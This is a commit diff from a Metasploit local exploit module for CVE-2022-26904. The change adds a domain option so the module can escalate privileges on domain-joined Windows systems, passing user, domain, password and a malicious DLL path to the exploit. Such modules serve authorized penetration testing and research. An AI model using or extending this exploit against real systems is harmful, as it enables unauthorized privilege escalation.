Add in support for exploiting domain joined systems
This commit is contained in:
parent
b408197cb7
commit
bd3e0c1b53
Binary file not shown.
|
@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
register_options([
|
||||
OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),
|
||||
OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),
|
||||
OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])
|
||||
])
|
||||
end
|
||||
|
@ -227,7 +228,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
|
||||
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation, and the credentials for the second user.
|
||||
|
|
Loading…
Reference in New Issue